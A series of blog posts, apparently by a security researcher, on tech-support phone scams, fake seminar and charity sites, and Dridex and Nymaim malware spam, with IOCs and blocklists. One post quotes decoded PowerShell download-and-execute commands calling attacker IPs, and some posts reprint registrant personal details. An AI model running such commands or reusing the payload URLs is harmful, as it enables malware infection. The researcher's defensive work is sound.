
Thursday, 12 January 2017

Scam: 01254522444, the fake BT engineer and 888DCA60-FC0A-11CF-8F0F-00C04FD7D062

In the past few weeks I have seen a huge upsurge in the number of Indian tech support scammers ringing, both at home and my place of work. (For example.. this).

One common trick they use revolves around the hexadecimal identifier 888DCA60-FC0A-11CF-8F0F-00C04FD7D062. Either it's a signal that hackers are at your PC, or it's your secret router ID that only BT would know.

The conversation goes something like this..

Victim: "But I don't get my internet from BT.."

Scammer: "BT provides all the internet connections for everyone else, including TalkTalk and Virgin Media."

Victim: "How do I know you're from BT?"

Scammer: "There is a confidential Router ID that only BT will know. You can verify this to prove that we are BT."

The scammer then talks the victim through pressing Windows+R, typing CMD (followed by OK) and then ASSOC (followed by RETURN). That simply produces a list of file associations (e.g. to say that .xlsx is an Excel spreadsheet). The line they want you to see is:
.ZFSendToTarget=CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}
This is just something to do with how Windows handles compressed files and folders. All Windows machines should have this entry, but it looks sufficiently scary to impress at least some victims.

NEVER GIVE THESE PEOPLE ACCESS TO YOUR PC.

However, if you want to waste their time please do so.. if you work in IT you can probably play a convincingly dumb user. It seems that they will try for up to 40 minutes or so before they give up. Alternatively, say that you have to get your laptop out from somewhere and it is very slow and just put them on hold. Every minute of their time you can waste will stop them targeting other potential victims.

And don't just ignore the call - report it. If you are in the UK you can report this sort of scam to Action Fraud - it will certainly help law enforcement if they have an idea of how many potential victims there are.

Friday, 23 December 2016

02085258899 - tech support scam (using anydesk.com, teamviewer.com and supremofree.com)

If these people ring you DO NOT GIVE THEM ACCESS TO YOUR PC and either hang up - or waste their time like I do.

It seems there are some prolific technical support scammers ringing from 02085258899 pretending to be from BT. They had a very heavy Indian accent, and they have made many silent calls to my telephone number before today. They claim that hackers are accessing my router.

I wasted 37 minutes of their time; these are some of the steps to watch out for..

  1. They get you to open a command prompt and type ASSOC which brings up a big long list of file associations, in particular they seem interested in one that says .ZFSendToTarget=CLSID\{888DCA60-FC0A-11CF-8F0F-00C04FD7D062}
  2. Then they get you to bring up the Event Viewer by typing EVENTVWR and then clicking "Custom Views" and "Administrative Events". This is a log file that will always show a whole bunch of meaningless errors (such as network faults). It's quite normal for this to look quite bad to the untrained eye.
  3. Then in order they try to get you to connect to the following services to take remote control of your PC: www.anydesk.com, www.teamviewer.com and www.supremofree.com. All of these are legitimate services, but I have to confess I'd never heard of the last one.. so I will add it to my corporate blacklist.
  4. When those didn't work they tried directing me to a proxy at hide.me/proxy and www.hide.me/proxy (the same thing I know) which is probably another candidate for blocking.
Of course, once they have access to your PC they will try to convince you that you need to pay them some money for technical support. Be warned, that they can render your PC unusable if you don't pay, and they can also steal confidential data. Despite how many times they may tell you they are from BT, they are not.. they are simply fraudsters.

Thursday, 17 December 2015

Malware spam: "Email from Transport for London" / noresponse@cclondon.com

This fake TfL spam is meant to have a malicious attachment, but is malformed.

From:    noresponse@cclondon.com
Date:    17 December 2015 at 08:54
Subject:    Email from Transport for London

Dear Customer,

Please open the attached file to view correspondence from Transport for
London.

If the attachment is in PDF format you may need Adobe Acrobat Reader to
read or download this attachment.

If you require Adobe Acrobat Reader this is available at no cost from
the Adobe Website http://www.adobe.com

Thank you for contacting Transport for London.



Business Operations
Customer Service Representative

______________________________________________________________________
This email has been scanned by the Symantec Email Security.cloud service.
For more information please visit http://www.symanteccloud.com

This email and any attachment are intended solely for the addressee, are strictly confidential and may be legally privileged. If you are not the intended recipient any reading, dissemination, copying or any other use or reliance is prohibited. If you have received this email in error please notify the sender immediately by email and then permanently delete the email.
______________________________________________________________________

The attachment is not properly formatted and appears as a Base64 section of the email. What it should be is a malicious document named FR7000609906.doc which has a VirusTotal detection rate of 4/54.

The Malwr analysis of the document indicates that it downloads from:

www.riucreatives.com/65dfg77/kmn653.exe

This has a detection rate of 3/54 and an MD5 of d5e717617400b3c479228fa756277be1. The Malwr report and Hybrid Analysis indicate network traffic to:

151.80.142.33 (OVH, France)
117.239.73.244 (Marian International Institute Of Management, India)


The payload is likely to be the Dridex banking trojan.

Recommended blocklist:
151.80.142.33
117.239.73.244

Tuesday, 15 December 2015

Malware spam: "Invoice Attached" / "Accounting Specialist| Bank of America, N.A., Cabot Oil & Gas Corp."

This fake financial spam has a malicious attachment:

From:    Ernestine Harvey
Date:    15 December 2015 at 11:34
Subject:    Invoice Attached

Good morning,

Please see the attached invoice and remit payment according to the terms listed at the bottom of the invoice. If you have any questions please let us know.

Thank you!

Mr. Ernestine Harvey
Accounting Specialist| Bank of America, N.A., Cabot Oil & Gas Corp.
The sender name varies randomly, but in the email they are all signed "Mr." even when the names are female, for example:

Mr. Colleen Sheppard
Mr. Joel Small
Mr. Esther Gates
Mr. Devin Joyce
Mr. Todd Robertson

The attachments are named in the format invoice_12345678_scan.doc - the filenames are randomly-generated and indeed every attachment seems to be unique. Typical VirusTotal detection rates are around 3/54, and the macro looks something like this.

An analysis of five of the attachments [1] [2] [3] [4] [5] shows attempted downloads from:

modern7technologiesx0.tk/x1656/dfiubgh5.exe
forbiddentextmate58.tk/x1656/ctruiovy.exe
temporary777winner777.tk/x1656/fdgbh44b.exe
former12futuristik888.tk/x1656/fdgjbhis75.exe


Note that these are all .TK domains.. and they are all hosted on exactly the same server, 31.184.234.5 (GTO Ltd, Montenegro). A look at VirusTotal's report for that IP gives another malicious domain of:

servicexmonitoring899.tk

I would suggest that the entire 31.184.234.0/24 range looks pretty questionable.

Anyway, the downloaded binary has a VirusTotal detection rate of 4/55 and the comments indicate that rather surprisingly this is the Nymaim ransomware. The Hybrid Analysis indicates network traffic to xnkhfbc.in on 200.195.138.156 (Szabo & Buhnemann, Brazil). But in fact that domain seems to move around a lot and has recently been seen on the following IPs:

41.224.12.178 (Orange Tunisie Internet, Tunisia)
51.255.59.248 (OVH, France)
78.107.46.8 (Corbina Telecom, Russia)
95.173.163.211 (Netinternet, Turkey)
118.102.239.53 (Dishnet, India)
140.116.161.33 (TANET, Taiwan)
185.114.22.214 (Osbil Technology Ltd., Turkey)
192.200.220.42 (Global Frag Networks, US)
200.195.138.156 (Szabo & Buhnemann Ltda, Brazil)
210.150.126.225 (HOSTING-NET, Japan)


There are a bunch of bad domains associated with this malware but the only other one that seems to be active is oxrdmfdis.in.

MD5s:



Recommended blocklist:


UPDATE

A source tells me (thank you) that servicexmonitoring899.tk is now resolving to 78.129.252.19 (iomart, UK), which has also recently hosted the following domains:

google-apsm.in
specre.com
ganduxerdesign.com
www.ganduxerdesign.com
upmisterfliremsnk.net
tornishineynarkkek.org
tornishineynarkkek2.org

Some of these domains are associated with Rovnix.

Thursday, 26 November 2015

Random "Payment" spam leads to Dridex

I have only seen one version of this spam message so far:

From:    Basia Slater [provequipmex@provequip.com.mx]
Date:    26 November 2015 at 12:00
Subject:    GVH Payment

I hope you had a good weekend.
Please check the payment confirmation attached to this email. The Transaction should appear on your bank in 2 days.


Basia Slater
Accountant
Comerica Incorporated
This sample had a document name of I654WWFR3C6.doc which has a VirusTotal detection rate of 6/55, containing this malicious macro [pastebin]. The Malwr report for this version indicates a download from:

harbourviewnl.ca/jo.jpg?6625

According to that Malwr report, it drops a file YSpq2bkGVIi5yaPcv6667.exe (MD5 6c14578c2b77b1917b3dee9da6efcd56) which has a detection rate of 1/53. The Hybrid Analysis report and Malwr report for that indicate malicious traffic to:

94.73.155.10 (Telekomunikasyon Anonim Sirketi, Turkey)
199.175.55.116 (VPS Cheap INC, US)


Note that 94.73.155.12 is mentioned in this other Dridex report today; both IPs form part of a small subnet, 94.73.155.8/29, suballocated to one "Geray Timur Akkurt".

My contacts (you know who you are, thank you) indicate that the emails are generated according to the following pattern:

From: (random)
Subject: ABC Transaction
  - raw Subject: =?UTF-8?Q?ABC__Transaction?=
  - matching /[A-Z]{1,3} (Invoice|Payment|Transaction|Transfer)/
X-mailer: Thunderbird 9.23
  - matching /[1-9]\.[1-9]{2}/
Attachment: "Z98Y76.doc"
  - matching /[A-Z0-9]{4,14}\.doc/
They indicate an additional download location of:

gofishretail.com/jo.jpg?[4-digit-random-number]

with an additional C2 location of:

113.30.152.170 (Net4india, India)

Recommended blocklist:
94.73.155.8/29
199.175.55.116
113.30.152.170
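As an added example (my own code, not something from the original post), here is a small Python triage script that applies the three header patterns described above (subject, X-Mailer version, attachment name) to a constructed message; the sample messages, placeholder addresses and the two-indicator threshold are my assumptions, and the subject is whitespace-normalised so that the double-underscore Q-encoded form seen in the wild still matches.

```python
import re
from email import message_from_string, policy

# The three patterns quoted in the post; the ^/$ anchors are my addition.
SUBJECT_RE = re.compile(r"^[A-Z]{1,3} (Invoice|Payment|Transaction|Transfer)$")
XMAILER_RE = re.compile(r"^Thunderbird [1-9]\.[1-9]{2}$")   # bogus version such as 9.23
ATTACH_RE = re.compile(r"^[A-Z0-9]{4,14}\.doc$")             # e.g. I654WWFR3C6.doc


def normalise_subject(msg):
    """Decode the RFC 2047 subject and collapse runs of whitespace.

    The raw header "=?UTF-8?Q?ABC__Transaction?=" decodes to two spaces
    between the token and the word, so matching uses the normalised form.
    """
    return " ".join(str(msg.get("Subject", "")).split())


def campaign_indicators(raw_message):
    """Return the list of indicators from the post that a message matches."""
    msg = message_from_string(raw_message, policy=policy.default)
    hits = []
    if SUBJECT_RE.match(normalise_subject(msg)):
        hits.append("subject")
    if XMAILER_RE.match(str(msg.get("X-Mailer", "")).strip()):
        hits.append("x-mailer")
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        if ATTACH_RE.match(name):
            hits.append("attachment:" + name)
    return hits


def is_suspect(raw_message, threshold=2):
    """Flag a message when at least `threshold` indicators match (threshold is my choice)."""
    return len(campaign_indicators(raw_message)) >= threshold


# Constructed sample modelled on the headers in the post; addresses are placeholders.
SAMPLE_DRIDEX = """\
From: Basia Slater <sender@example.invalid>
To: recipient@example.invalid
Subject: =?UTF-8?Q?GVH_Payment?=
X-Mailer: Thunderbird 9.23
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain; charset="utf-8"

Please check the payment confirmation attached to this email.

--b1
Content-Type: application/msword; name="I654WWFR3C6.doc"
Content-Disposition: attachment; filename="I654WWFR3C6.doc"
Content-Transfer-Encoding: base64

AAAA
--b1--
"""

# Constructed benign message for comparison.
SAMPLE_BENIGN = """\
From: Colleague <colleague@example.invalid>
To: recipient@example.invalid
Subject: Re: meeting notes
X-Mailer: Thunderbird 38.5.0
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b2"

--b2
Content-Type: text/plain; charset="utf-8"

Notes attached.

--b2
Content-Type: application/pdf; name="notes.pdf"
Content-Disposition: attachment; filename="notes.pdf"
Content-Transfer-Encoding: base64

AAAA
--b2--
"""

if __name__ == "__main__":
    print(campaign_indicators(SAMPLE_DRIDEX), is_suspect(SAMPLE_DRIDEX))
    print(campaign_indicators(SAMPLE_BENIGN), is_suspect(SAMPLE_BENIGN))
```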



Monday, 26 October 2015

Fake seminar sites to avoid, registered to vravindhar@yahoo.com

A contact tipped me off to some fake financial seminar sites, all linked to the email address vravindhar@yahoo.com. They are promoted in spam emails similar to these:

From: rob.koster@fatcacomplianceinstitute.com [mailto:rob.koster@fatcacomplianceinstitute.com]
Sent: Wednesday, August 05, 2015 8:33 AM
To: redacted
Subject: FATCA Compliance - [redacted]
Importance: High

Dear Participants,

We are pleased to announce you that FATCA Compliance Institute is conducting a 2 day practical seminar on FATCA Compliance.

This seminar is going to be repeated and held thrice:
[redacted]

The seminar is open to all the Banking & Financial Professionals. The seminar particulars are attached with this mail.

Last date for enrolling your participation is [redacted], 2015.

Please contact for assistance.

Truly,
Rob Koster
Seminar Secretary
Tel:+31-800-020-0534(Netherlands and Other EU Countries) 
       +1-312-625-0112(All Other Countries)
FAX:+31-800-020-0534

And also..

 From: alfred@pacibankers.com [mailto:alfred@pacibankers.com]
Sent: Wednesday, February 11, 2015 11:50 AM
Subject: Asset Management Auditing and Internal Accounting Controls - [redacted]
Importance: High




Asset Management Auditing and Internal Accounting Controls - 2 Day Program

Dear Delegate
Pacific Standards (www.pacificstandards.com) would like to invite representatives from your organization to attend the above mentioned program scheduled for 2015. We are limiting the number of participants for each cluster to 20, as the courses are designed to be interactive and to encourage discussion and the exchange of ideas.

Program Dates:
  Cluster I - February 25 - 26, 2015
  Cluster II - March 9 - 10, 2015
  Cluster III - March 18 - 19, 2015
  Cluster IV - April 6 - 7, 2015
  Cluster V - April 15 - 16, 2015

Venue: {redacted}
We invite you to nominate individuals from your respective organization. It is also important to stress that all available slots will be filled on a first come first serve basis. Please advise your colleagues to attend and take advantage of this valuable and pivotal workshop.(Please see the attached brochure for complete course coverage).
Early Registration Deadline is February 15, 2015 
Last Date of Registration is February 17, 2015 


Looking forward for an early reply.

Thanks & Regards,
Alfred
Pacific Standards
Marketing Manager
Contact Number: +91-8801-990-204

Emails are sent from 159.253.145.90 (Softlayer, Netherlands). The registrant details look like this on most of the domains:
Registry Registrant ID:
Registrant Name: Ravindhar V
Registrant Organization:
Registrant Street: office:7, sushant lok , sushant estate
Registrant City: gugaon
Registrant State/Province: Haryana
Registrant Postal Code: 122002
Registrant Country: India
Registrant Phone: +91.9999960651
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: vravindhar@yahoo.com
Registry Admin ID:
The emails specifically target the finance sector with what appear to be relevant seminars and services; however, once payment has been received there is reportedly no further communication and no seminars.

There are a large number of related sites, some using several different domains. There are virtually zero references to these "organisations" on Google, and a close examination of the sites shows several red flags.

Pacific Standards

Claiming to be in Singapore, but boasting an Indian phone number of +91-8801990204, this outfit claims to be part of "Grenoble Learning". Neither Pacific Standards nor Grenoble Learning actually appear to exist.


Domains used:
pacificstandards.com
pacibankers.com
pacific-compliance.com
pacificstan.cc
pacificstan.com
pacificstandards.org

Brown & Co

This claims to be based at 12 Flemington Street, Glasgow but quotes a US contact number of 1-800-BRO-CORP / 1-800-246-8115. There are many, many companies in the UK with the name "Brown & Co", but where you would expect to see number 12 on that street.. there appears to be a car park.

Domains used:

beta-essentials.me
browncorpuk.org
browncorp.co
betaeventhub.org
betaessentials.in

FATCA Compliance Institute

A quick Google search for "FATCA Compliance Institute" reveals exactly zero reliable references to this important-looking organisation, boasting contact details in both India and The Netherlands.
15-66 plot 101 Prabhu Nagar
Poranki 521137.
Tel:+31-800-020-0534(Netherlands and Other EU Countries)
FAX:+31-800-020-0534 (ONLY EU)
FAX: +31-20-524-1592 (ALL COUNTRIES)
USA Tel: +1-312-625-0112 (All other Countries)
Email: director@fatcacompliance.cc

Corporate Office:

Keizersgracht 209
1006 DT Amsterdam
The Netherlands
The Netherlands Toll-Free:
Tel:+31-800-020-0534
FAX:+31-800-020-0534

USA Tel: +1-312-625-0112 (All other Countries)
Email: director@fatcacompliance.cc

Domains used:

fatcacomplianceinstitute.org
fatcacomplianceinstitute.com
fatcacompliance.cc
fatcacompliance.net
fatcacompliance.org

Rightman Group

The web site here looks very slick. But if you Google for snippets of somewhat ungrammatical text (such as "But, one things remains unchanged – our dedication to doing the best work in the world.") you will find that there are hundreds of sites using the exact same template. Rightman Group has the following contact details listed:

Rightman Group
 United States
199 Scott Street
Suite 810
Buffalo, NY 14204
+1-716-217-2817
USA call charges apply.
---------
 Dreikönigstrasse 30
Zürich, Switzerland
----------
+41-43-508-1974 

The New York State Division of Corporations has no such company as "Rightman Group" listed.


Domains used:

rightmangroup.com
rightman.eu
rightman.cc
rightmangroup.net
rightmangroup.org

Swiss Dossier

I can only imagine that the name "Swiss Dossier" came about through an error in autotranslation. It lists several addresses:

info@swissdossier.com(General)
offices@swissdossier.com(Training Programs)

Tel:  +1-786-235-8424(USA)

Our Global offices are located at:
19th Floor, Prudential Towers(North Side)
Office no: 1901
Chulia Street
Singapore

Aeschenvorstadt, 405
Basel,
Switzerland

79 Thornall Street,
6th Floor, Edison, NJ 08837.
New Jersy
USA

70 Sheppard Avenue, Suite 301,
North York, Ontario M2N 3A4,
Canada

A Google search for "swissdossier.com" comes up with no independent and reliable references to this so-called company.


Domains used:

swissdossier.com
swissdossier.cc
swissdossier.com.co

Treasury Management Institute

According to Companies House in the UK, there is no company in the UK with the name "Treasury Management Institute". The contact details indicate that this is perhaps the workplace of John or Jane Doe:

Email : 
 jdoe@treasurymanagementinstitute.com
 jdoe@treasurymanagementinstitute.cc
Addresses:
01, Temple Quay, Temple Back East, Bristol, BS1 6DZ, UK
SWConsulting Group, Sec 42 Gurgaon, India(Institute operates under the licence of SWConsulting Group)
There are no independent references to this organisation existing in Bristol.


Domains used:

treasurymanagementinstitute.com
treasurymanagementinstitute.cc
treasurymanagementinstitute.org

Financial Models India

Sharing the same contact details as some of these other highly questionable sites, and hosted on the same infrastructure, Financial Models India would appear to fail the Duck Test.

79 Thornall Street,
6th Floor, Edison, NJ 08837,
New Jersy,
USA

19th Floor,
Prudential Towers (North Side),
Office no: 1901,
Chulia Street, Singapore

Aeschenvorstadt, 405,
Basel, Switzerland

70 Sheppard Avenue,
Suite 301, North York,
Ontario M2N 3A4,
Canada

DLF Square M Block,
Jacaranda Marg DLF City, Phase II,
Gurgaon 122002, INDIA  

Domains used:

financialmodelsindia.com
financialmodels.co.in
fmtsglobal.com
unitedcapital-financialmodels.com
unitedcapitalglobal.com

Virat World Wide

This appears to be the firm or individual behind these sites. The "About Us" page says:

Ravindhar.V - Managing Director

Mr. Ravindhar is an able administrator and change master. He has rich experience in thearea of Financial Information Technology(FIT). He has developed financial software products and Information Technology management solutions for financial institutions and banks in more than a fifty countries and for top global Banks and companies. His qualification is Master of Finance and Accounting with a track of computer applications in Finance and Accounting(MFA). Mr.Ravindhar comes from Business Family of Poranki Sugars and his family is a legacy of entrepreneurs based in India. Group is widely respected by the industry.
I'm guessing that the "V" stands for "Virat", making him "Ravindhar Virat". The contact details list an address in the... errr. UNITED KIGDOM.

Global Support
+919-618-921-876
customersupport@virat.consulting
120, CENTRAL STREET
CLERKENWELL
LONDON
UNITED KIGDOM
This address is actually a hotel. The +91 telephone number is a number in India, not the UK.


Domains used:

virat.consulting
virat-transitionalhunts.biz
virat-th.co.in

Other domains

The other domains (mostly now defunct or with no content) also appear to belong to the same operator:


If you have any experiences with any of these "companies", feel free to leave a comment.

Thursday, 30 April 2015

Nepal Earthquake scam: savenepal.org

I was tipped off to this site by a contact: it appears that some particularly despicable scammers have registered a fake website called savenepal.org which is soliciting donations via PayPal.

The site is largely cloned from the legitimate ActionAid site, which is genuinely seeking donations for Nepal.

ActionAid is "Registered charity no 274467" (it says so on the bottom of the page). SaveNepal.org claims to be "Registered charity no 276187", but we can check at the UK charities commission and we can see that the charity with this number is actually an orchestra.


Clicking "Donate" on the scam site leads to PayPal. It doesn't give much of a clue about the ownership of the fake site:


The WHOIS details for the domain are hidden using WhoIsGuard. These other sites appear to be live on the same server:

com-indexhtml.link
com-indexhtml.us
grantsekit.com

Out of these, only com-indexhtml.us has a non-anonymous WHOIS entry:

Registrant ID:                               C4E83B25FA8AD52D
Registrant Name:                             Frank J. Moore
Registrant Address1:                         2441 Byers Lane
Registrant City:                             Davis
Registrant State/Province:                   CA
Registrant Postal Code:                      95616
Registrant Country:                          United States
Registrant Country Code:                     US
Registrant Phone Number:                     +1.5307574940
Registrant Email:                            uscustomerhelp@gmail.com
Registrant Application Purpose:              P1
Registrant Nexus Category:                   C12


I'm pretty sure that those contact details are fake. Going back through historical WHOIS comes up with different contact details:

Registrant ID:                               29B0B5BBD7190398
Registrant Name:                             dinna  james
Registrant Address1:                         po box 876
Registrant City:                             dl
Registrant State/Province:                   dl
Registrant Postal Code:                      110098
Registrant Country:                          India
Registrant Country Code:                     IN
Registrant Phone Number:                     +1.918978978
Registrant Email:                            helpot80@gmail.com
Registrant Application Purpose:              P1
Registrant Nexus Category:                   C12


Of course, these contact details could also be false and there's no definite connection to savenepal.org yet. But out of curiosity, who is helpot80@gmail.com? Googling doesn't reveal much, but it does show a copy of a conversation in the news.admin.net-abuse.email newsgroup where someone who is claiming to use this email address is complaining about spam. If we then use Google Groups to find the original newsgroup post, we see it was posted from an IP of 182.68.85.242, which is a dynamic Bharti Airtel IP in India and does at least match the country in the WHOIS details.

Another Google result is this Phishtank entry listing social2013.com/rockgrade/ which appears to be a copy of the Rock Grade Management scam site I covered way back in 2011, indicating that perhaps these two scams are related. helpot80@gmail.com was listed as the owner of social2013.com before it expired in February 2015.

This WHOISology report links the address to several domains:

beauty6k.com
social2013.com
droughty.com
auto36.us
secure2013.us

Also, 94.242.255.129 has hosted many other domains, many of which appear to be scammy.


Many of these have the helpot80@gmail.com address listed in their historical WHOIS entries.

What else can we find out?

The email address is connected with this scammy-looking Facebook page allegedly giving away "free laptops".



The email address also links to this Google+ profile naming them as "N. Al.". It also links to this YouTube channel with a single video about Payoneer. These profiles indicate that helpot80@gmail.com has an interest in affiliate marketing, an activity with a mixed reputation.

I cannot prove that helpot80@gmail.com is connected with the savenepal.org, but they probably know whoever is behind it.

Remember, if you want to donate to ANY disaster charity, it is worth checking very carefully that you are dealing with the real thing and not a bunch of scammers.

Tuesday, 7 April 2015

Malware spam: "EBOLA INFORMATION" / "noreply@ggc-ooh.net"

This fake medical email contains a malicious attachment. It's a novel approach by the bad guys, but I doubt that many people will find it believable enough to click.

From:    noreply@ggc-ooh.net
Reply-To:    noreply@ggc-ooh.net
Date:    7 April 2015 at 08:58
Subject:    EBOLA INFORMATION

This email is generated from an unmanned mailbox. Dr N J Gaw can be contacted via noreply@ggc-ooh.net

PLEASE SEE THE ATTACHED CORRESPONDENCE FOR YOUR INFORMATION.

THANK YOU.
Attached is a file 30.03.15 Ebola Virus (2).doc which contains this malicious macro [pastebin], which uses a lot of girls' names as variables (which makes a nice change from the randomly-generated stuff I suppose).

When decoded the macro downloads a component from:

http://deosiibude.de/deosiibude.de/220/68.exe

VirusTotal submissions seem to be down at the moment, so I can't tell you what the detection rate is. Automated analysis tools [1] [2] [3] show it phoning home to the following IPs (the first group listed is most likely static, the second group looks to be dynamic):

37.140.199.100 (Reg.Ru Hosting, Russia)
46.228.193.201 (Aqua Networks Ltd, Germany)
130.241.92.141 (Goteborgs Universitet, Sweden)
46.101.49.125 (Digital Ocean Inc, UK)
122.167.6.68 (ABTS, India)
5.100.249.215 (O.M.C. Computers & Communications Ltd, Israel)

85.255.173.109 (Satnet Ltd, Bulgaria)
217.37.39.235 (BT Broadband, UK)
81.190.50.232 (Multimedia Polska S. A., Poland)
89.228.15.18 (Multimedia Polska S. A., Poland)

According to the Malwr report it drops a whole load of files including what is probably a Dridex DLL.

Recommended blocklist:


MD5s:



Thursday, 2 April 2015

Malware spam: "Copy invoices Snap on Tools Ltd" / "Allen, Claire [Claire.Allen@snapon.com]"

This fake invoice does not come from Snap On Tools, but is instead a simple forgery.

From:    Allen, Claire [Claire.Allen@snapon.com]
Date:    24 February 2015 at 14:41
Subject:    Copy invoices Snap on Tools Ltd

Good Afternoon

Attached are the copy invoices that you requested.

Regards

Claire

Your message is ready to be sent with the following file or link attachments:

SKETTDCCSMF14122514571


Note: To protect against computer viruses, e-mail programs may prevent sending or receiving certain types of file attachments.  Check your e-mail security settings to determine how attachments are handled.
I have only seen one copy of this with an attachment SKETTDCCSMF14122514571.doc which contains this malicious macro [pastebin], which downloads a further component from:

http://ws6btg41m.homepage.t-online.de/025/42.exe

This executable has a detection rate of 5/57. Various automated analyses [1] [2] [3] [4] show attempted communications to the following IPs:

91.242.163.70 (OOO Sysmedia, Russia)
72.167.62.27 (GoDaddy, US)
62.113.219.35 (23Media GmbH, Germany)
46.101.49.125 (Digital Ocean, UK)
130.241.92.141 (Goteborgs Universitet, Sweden)
198.245.70.182 (Deniz Toprak / B2 Net Solutions Inc., US)
94.23.173.233 (OVH, Czech Republic)
14.98.243.243 (Tata Indicom, India)
5.100.249.215 (O.M.C. Computers & Communications, Israel)
62.113.223.227 (23Media GmbH, Germany)

According to this Malwr report  it drops another version of the downloader called edg1.exe [VT 4/57] and a malicious Dridex DLL [VT 2/57].

Recommended blocklist:

MD5s:

Wednesday, 25 February 2015

Malware spam: "Your LogMeIn Pro payment has been processed!"

This fake financial email does not come from LogMeIn, instead it has a malicious attachment:

From:    LogMeIn.com [no_reply@logmein.com]
Date:    25 February 2015 at 08:52
Subject:    Your LogMeIn Pro payment has been processed!

Dear client,

Thank you for purchasing our yearly plan for LogMeIn Pro on 25 computers.
Your credit card has been successfully charged.

Date : 25/2/2015
Amount : $999 ( you saved $749.75)



The transaction details can be found in the attached receipt.
Your computers will be automatically upgraded the next time you sign in.


Thank you for choosing LogMeIn!
Attached is a malicious Excel document called logmein_pro_receipt.xls with a VirusTotal detection rate of 0/56. Usually in a spam run like this there are several different versions of the document but so far I have only seen one, containing this malicious macro. The macro downloads a file from:

http://junidesign.de/js/bin.exe

This is saved as %TEMP%\GHjkdfg.exe and has a VirusTotal detection rate of 3/57. Automated analysis tools [1] [2] [3] show this calling home to the following IPs:

92.63.87.13 (MTWV, Latvia)
86.104.134.156 (One Telecom, Moldova)
217.12.203.34 (ITL, Bulgaria)
108.61.165.19 (Choopa LLC, Netherlands)
5.196.241.196 (OVH, Ireland)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
95.163.121.179 (Digital Networks aka DINETHOSTING, Russia)
59.97.137.171 (Broadband Multiplay, India)
78.140.164.160 (Webazilla, US)
107.181.174.104 (Colo at 55, US / UA Servers, Ukraine)
I outlined some of the problems with MTWV in this post. The Malwr report shows that, among other activities, this drops an executable that seems to be another version of itself [VT 3/57] and a malicious DLL which is probably a Dridex component [VT 4/57].

Recommended blocklist:

UPDATE:  a different version of the attachment [VT] uses this macro to download from:

http://jacekhondel.w.interia.pl/js/bin.exe

The payload is identical to the other variant.

Thursday, 19 February 2015

Malware spam: "Maria Wilson" / "securigroup.co.uk" / "Statement"

This fake financial spam does not come from SecuriGroup; their systems have not been compromised in any way, nor has there been any leak of information. Instead, this is a simple forgery with a malicious document attached.

From:    Maria Wilson [maria.wilson6870@securigroup.co.uk]
Date:    19 February 2015 at 09:10
Subject:    Statement

Please see attached up to date statement.

I would be grateful if you could confirm all due invoices have been processed for payment.

Many thanks
Maria

Maria Wilson | Credit Controller

T: 0141 285 3838


www.securigroup.co.uk


Think Sustainability - Do not print this email unless essential


This email and any attachments are confidential and intended for the addressee only.

If you are not the named recipient, you must not use, disclose, reproduce, copy or distribute the contents of this communication.

If you have received this in error, please contact the sender and then delete this email from your system.

The impact on this innocent company appears to be severe, with their website currently suspended.

I have seen only one sample of the attachment, Statement 18 FEB 2015.xls, although there are probably other variants. This contains a set of macros [password=infected] which are mostly crap, but the key parts are Modules 13 (the encrypted strings) and 27 (the decrypt function). These macros download a file from the following location:

http://hazardcheck.de/js/bin.exe

This is saved as %TEMP%\FfdgF.exe which has a VirusTotal detection rate of 5/57. Various automated analysis tools [1] [2] [3] show attempted network connections to:

83.169.4.178 (Hosteurope, Germany)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
14.99.146.242 (Tata Indicom, India)
78.140.164.160 (Webazilla, US)
220.143.5.92 (Chunghwa Telecom, Taiwan)
217.12.203.34 (ITL Company, Bulgaria)

The Malwr report shows it dropping another version of the downloader (VT 3/57) and a malicious DLL (VT 6/57). The payload is probably Dridex.

Recommended blocklist:



Monday, 16 February 2015

Malware spam: "Re: Data request [ID:91460-2234721]" / "Copy of transaction"

This rather terse spam comes with a malicious attachment:

From: Rosemary Gibbs
Date:    16 February 2015 at 10:12
Subject:    Re: Data request [ID:91460-2234721]

Copy of transaction.

The sender's name, the ID: number and the name of the attachment vary in each case. Example attachment names are:

869B54732.xls
BE75129513.xls
C39189051.xls

None of the three attachments are detected by anti-virus vendors [1] [2] [3]. They each contain a slightly different macro [1] [2] [3]. The critical part of the encoded macro looks like this:

It's quite apparent that this is ROT13-encoded, which you can easily decode at rot13.com rather than working through the macro. These three samples give us:

"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://85.143.166.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';" 
"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.104/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';" 
"cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://5.196.175.140/fdhtepopdhd/sfbwurwfl/wyxbdf.exe','%TEMP%\JIOiodfhioIH.exe');Start-Process '%TEMP%\JIOiodfhioIH.exe';"

So, these macros are attempting to use PowerShell to download and execute the next stage (possibly to avoid the UAC popup). The downloaded binary has a VirusTotal detection rate of 3/57, and automated analysis tools [1] [2] [3] show attempted communications with:

85.143.166.72 (Pirix, Russia)
205.185.119.159 (FranTech Solutions, US)
92.63.88.87 (MWTV, Latvia)
173.226.183.204 (TW Telecom, Taiwan)
27.5.199.115 (Hathway Cable and Datacom, India)
149.171.76.124 (University Of New South Wales, Australia)
46.19.143.151 (Private Layer, Switzerland)


It also drops a DLL with a 4/57 detection rate which is the same malware seen in this attack.
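A defender's take on the decoding step described above, as an added example that is not part of the original post: it ROT13-decodes a macro string and pulls the download URL and drop path out of the DownloadFile/Start-Process chain. The sample string is constructed for this example by ROT13-encoding the post's first decoded command; the function names are my own.

```python
import re
import string

# ROT13 rotates ASCII letters by 13 places and leaves digits, punctuation and
# path separators alone, which is why the IPs and URL structure are still
# visible in the obfuscated macro strings before decoding.
_ROT13 = str.maketrans(
    string.ascii_lowercase + string.ascii_uppercase,
    string.ascii_lowercase[13:] + string.ascii_lowercase[:13]
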